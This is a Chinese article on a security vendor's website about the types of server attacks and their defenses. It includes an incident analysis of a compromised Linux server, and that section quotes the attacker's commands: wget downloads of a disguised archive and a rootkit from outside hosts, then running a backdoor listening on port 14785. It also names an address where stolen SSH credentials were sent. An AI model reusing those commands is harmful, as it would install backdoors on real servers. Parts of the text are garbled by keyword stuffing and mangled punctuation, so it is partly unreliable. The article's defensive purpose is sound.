行业动态

防御吧作为15年知名老牌域名服务商,CNNIC和CANN双认证域名注册商,已经
持续为500多万个域名提供服务,包括智能DNS/自由转移/隐私保护等服务!
服务器被攻击了,有什么办法解决吗?
2021-12-05 20:03:20 【

服务器攻击类型有哪些入侵服务器?作为服务器管理员来说,当服务器受到攻击时我们要清楚是哪种类型的攻击,这样才好对标解决问题。总体来说服务器常遇到的攻击有以下几种:

1入侵服务器、DDoS(分布式拒绝服务)攻击

这个DDoS攻击其实就是流量攻击,它的原理就是利用很多客户端向服务器发送大量的请求,使服务器的网络过载、服务器负载飙升,从而让其它合法用户无法正常请求服务器入侵服务器。从本质上说DDoS带来的流量也是正常的流量,所以一般DDoS是很难防御的。

DDoS攻击针对的是服务器的网络层。

2、CC攻击

CC攻击原理就是黑客利用大量的主机(客户端)向我们的服务(特别是消耗CPU时间的服务)不停的请求,造成服务器资源浪费,CC攻击时服务器CPU常常是占满状态的。

CC攻击针对的是WEB应用层(如网站)。

3、WEB攻击

这种攻击主要是利用当前的WEB应用存在的漏洞进行系统及数据破坏的行为,手段通常有:

SQL注入

XSS、CSRF攻击

爆库攻击等

4、劫持攻击

攻击者通过攻击DNS服务器或者更改DNS服务器来将请求重定向至其它服务器,比如钓鱼网站就是一种劫持。

5、服务器系统及应用漏洞攻击

这种就是嗅探服务器及其系统上的应用是否存在可利用的漏洞,然后针对性的攻击,比如Redis提权、弱口令提权等。


怎样分析一台被入侵的linux服务器?

 客户反映一台linux服务器老向外ssh扫描,登陆到服务器上,查看进程发现大量ssh-scan在运行,运行用户为mircte,查找ssh-scan这个文件,确定所在位置/var/log目录下  黑客进入服务器后所做的操作入侵服务器:  1。 向/var/tmp/下上传了两个恶意程序  其中wtf为向外扫描其它服务器的ssh-scan黑客软件,。
 access。log文件下存放有rootkit后门,服务器被当成了肉鸡跳板,开放14785端口等待入侵者连接,扫描其它服务器所得到的账号都发送到diavolu_gol@yahoo。com这个邮箱。  2。 入侵者登陆记录  85。
 120。78。140的IP来自罗马尼亚。  3。 wget 。clan。su/scan/wtf。jpg ; tar zxvf wtf。jpg  wget adelinuangell。lx。ro/ryo。tar  tar xvf ryo。
 tar  cd 。access。log  。/config Ady 14785  。/run  结束进程。删掉程序。。删掉用户。修改root密码。


如何防止非法DHCP服务器的入侵呢?

 1、非法DHCP带来的灾害:一般公司内部都会有一个DHCP服务器来给员工计算机提供必要的网络参数信息的,例如IP地址,子网掩码,网关,DNS等地址,很多情况路由器就可以担当此重任。每次员工计算机启动后都会向网络中发送广播包寻找DHCP服务器(前提是该计算机被设置为自动获得IP地址),广播包随机发送到网络中,当有一台DHCP服务器收到这个广播包后就会向该包源MAC地址的计算机发送一个应答信息,同时从自己的地址池中抽取一个IP地址分配给该计算机。
 合法DHCP服务器可以提供正确的数据,非法DHCP服务器则提供的是错误的数据。我们如何让员工机器都通过合法DHCP服务器获得网络信息呢?如果是交换式网络则没有可能,因为广播包会发向网络中的所有设备,合法还是非法服务器先应答是没有任何规律的。这样网络就被彻底扰乱了,原本可以正常上网的机器再也不能连接到INTERNET。
 

2、消极防范:既然广播包会发向网络中的所有设备,合法还是非法服务器先应答是没有任何规律的,那么我们可以通过多次尝试广播包的发送来临时解决这个问题,直到客户机可以得到真实的地址为止。问题中网友使用的方法就是此手段。



服务器攻击如何处理?服务器受到攻击后,我们要针对性处理,以下是对应的解决方案:


1、DDoS攻击处理方案

联系机房做流量清洗,必要时使用高防IP;

使用CDN来分流;

实在不行把域名解析至 127.0.0.1 ;

2、CC攻击处理方案

系统要合理利用缓存,对于一些结果做好缓存,避免每次都去重复计算;

利用软防限制每个IP的连接数限制;

请求过多时启用验证码验证是否是机器行为;

3、WEB攻击处理方案

对于GET、POST请求做过滤,将一些敏感字符过滤掉;

对于用户提交的数据,务必做好数据类型检查和过滤;

数据库SQL语句不要使用拼接字符串这种形式,应该采用预编译和参数绑定这种方式;

如果WEB应用是采用开源CMS或者框架二次开发的,务必及时修复其官方发布的补丁;

站点目录及文件的读、写、执行权限要严格控制,特别是要注意upload目录的权限,防止上传了动态脚本甚至能直接执行;

4、服务器系统及应用漏洞处理方案

做好端口策略,防火墙里只开放必要的端口(除了WEB端口外,其它端口要特别留意);

服务器上不常用的服务全部停止掉;

WEB程序被破坏时使用备份文件还原;



】【打印关闭】 【返回顶部
分享到QQ空间
分享到: 
上一篇HP打印机存在八年的漏洞影响150种.. 下一篇互联网隐私方面的一些趋势预测

立足首都,辐射全球,防御吧专注云防御及云计算服务15年!

联系我们

服务热线:13051179500 18910191973
企业QQ:1245940436
技术支持:010-56159998
E-Mail:xihedata.com
Copyright ? 2003-2016 fangyuba. 防御吧(完美解决防御与加速) 版权所有 增值许可:京B2-20140042号
售前咨询
公司总机:18910191973
24小时电话:010-56159998
投诉电话:18910191973
值班售后/技术支持
售后服务/财务
备案专员
紧急电话:18610088800